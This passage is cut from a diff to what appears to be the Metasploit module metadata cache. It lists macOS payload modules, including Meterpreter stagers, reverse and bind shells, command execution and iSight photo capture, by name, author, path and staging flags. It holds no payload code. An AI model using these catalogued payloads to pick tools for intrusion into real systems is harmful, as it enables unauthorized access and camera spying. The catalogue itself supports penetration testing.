"/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter_reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/shell_bind_tcp": { + "name": "OS X x64 Shell Bind TCP", + "fullname": "payload/osx/aarch64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-02-01 01:05:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/shell_reverse_tcp": { + "name": "OSX aarch64 Shell Reverse TCP", + "fullname": "payload/osx/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-02 14:13:07 +0000", + "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/execute/bind_tcp": { + "name": "OS X Write and Execute Binary, Bind TCP Stager", + "fullname": "payload/osx/armle/execute/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/execute/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/execute", + "stager_refname": "osx/armle/bind_tcp" + }, + "payload_osx/armle/execute/reverse_tcp": { + "name": "OS X Write and Execute Binary, Reverse TCP Stager", + "fullname": "payload/osx/armle/execute/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/execute/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/execute", + "stager_refname": "osx/armle/reverse_tcp" + }, + "payload_osx/armle/shell/bind_tcp": { + "name": "OS X Command Shell, Bind TCP Stager", + "fullname": "payload/osx/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/shell", + "stager_refname": "osx/armle/bind_tcp" + }, + "payload_osx/armle/shell/reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/shell", + "stager_refname": "osx/armle/reverse_tcp" + }, + "payload_osx/armle/shell_bind_tcp": { + "name": "Apple iOS Command Shell, Bind TCP Inline", + "fullname": "payload/osx/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/shell_reverse_tcp": { + "name": "Apple iOS Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/vibrate": { + "name": "Apple iOS iPhone Vibrate", + "fullname": "payload/osx/armle/vibrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller .", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/armle/vibrate.rb", + "is_install_path": true, + "ref_name": "osx/armle/vibrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/ppc/shell/bind_tcp": { + "name": "OS X Command Shell, Bind TCP Stager", + "fullname": "payload/osx/ppc/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/bind_tcp" + }, + "payload_osx/ppc/shell/find_tag": { + "name": "OS X Command Shell, Find Tag Stager", + "fullname": "payload/osx/ppc/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/find_tag" + }, + "payload_osx/ppc/shell/reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/ppc/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/ppc/shell", + "stager_refname": "osx/ppc/reverse_tcp" + }, + "payload_osx/ppc/shell_bind_tcp": { + "name": "OS X Command Shell, Bind TCP Inline", + "fullname": "payload/osx/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/ppc/shell_reverse_tcp": { + "name": "OS X Command Shell, Reverse TCP Inline", + "fullname": "payload/osx/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/dupandexecve/bind_tcp": { + "name": "OS X dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/osx/x64/dupandexecve/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "nemo " + ], + "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/bind_tcp" + }, + "payload_osx/x64/dupandexecve/reverse_tcp": { + "name": "OS X dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/osx/x64/dupandexecve/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "nemo " + ], + "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/reverse_tcp" + }, + "payload_osx/x64/dupandexecve/reverse_tcp_uuid": { + "name": "OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)", + "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo", + "timwr" + ], + "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "osx/x64/dupandexecve/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/dupandexecve", + "stager_refname": "osx/x64/reverse_tcp_uuid" + }, + "payload_osx/x64/exec": { + "name": "OS X x64 Execute Command", + "fullname": "payload/osx/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/exec.rb", + "is_install_path": true, + "ref_name": "osx/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/meterpreter/bind_tcp": { + "name": "OSX Meterpreter, Bind TCP Stager", + "fullname": "payload/osx/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + "nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/bind_tcp" + }, + "payload_osx/x64/meterpreter/reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Stager", + "fullname": "payload/osx/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + "nemo " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/reverse_tcp" + }, + "payload_osx/x64/meterpreter/reverse_tcp_uuid": { + "name": "OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)", + "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x64/meterpreter", + "stager_refname": "osx/x64/reverse_tcp_uuid" + }, + "payload_osx/x64/meterpreter_reverse_http": { + "name": "OSX Meterpreter, Reverse HTTP Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/meterpreter_reverse_https": { + "name": "OSX Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/meterpreter_reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Inline", + "fullname": "payload/osx/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/say": { + "name": "OS X x64 say Shellcode", + "fullname": "payload/osx/x64/say", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Say an arbitrary string outloud using Mac OS X text2speech", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/say.rb", + "is_install_path": true, + "ref_name": "osx/x64/say", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_bind_tcp": { + "name": "OS X x64 Shell Bind TCP", + "fullname": "payload/osx/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_find_tag": { + "name": "OSX Command Shell, Find Tag Inline", + "fullname": "payload/osx/x64/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x64/shell_reverse_tcp": { + "name": "OS X x64 Shell Reverse TCP", + "fullname": "payload/osx/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "nemo " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/bundleinject/bind_tcp": { + "name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager", + "fullname": "payload/osx/x86/bundleinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/bundleinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/bundleinject", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/bundleinject/reverse_tcp": { + "name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager", + "fullname": "payload/osx/x86/bundleinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/bundleinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/bundleinject", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/exec": { + "name": "OS X Execute Command", + "fullname": "payload/osx/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "snagg ", + "argp ", + "joev " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/exec.rb", + "is_install_path": true, + "ref_name": "osx/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/isight/bind_tcp": { + "name": "Mac OS X x86 iSight Photo Capture, Bind TCP Stager", + "fullname": "payload/osx/x86/isight/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/isight/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/isight", + "stager_refname": "osx/x86/bind_tcp" + }, + "payload_osx/x86/isight/reverse_tcp": { + "name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager", + "fullname": "payload/osx/x86/isight/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ddz " + ], + "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/isight/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/x86/isight", + "stager_refname": "osx/x86/reverse_tcp" + }, + "payload_osx/x86/shell_bind_tcp": { + "name": "OS X Command Shell, Bind TCP Inline", + "fullname": "payload/osx/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/x86/shell_find_port": { + "name": "OS X Command Shell, Find Port Inline", + "fullname": "payload/osx/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "OSX", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 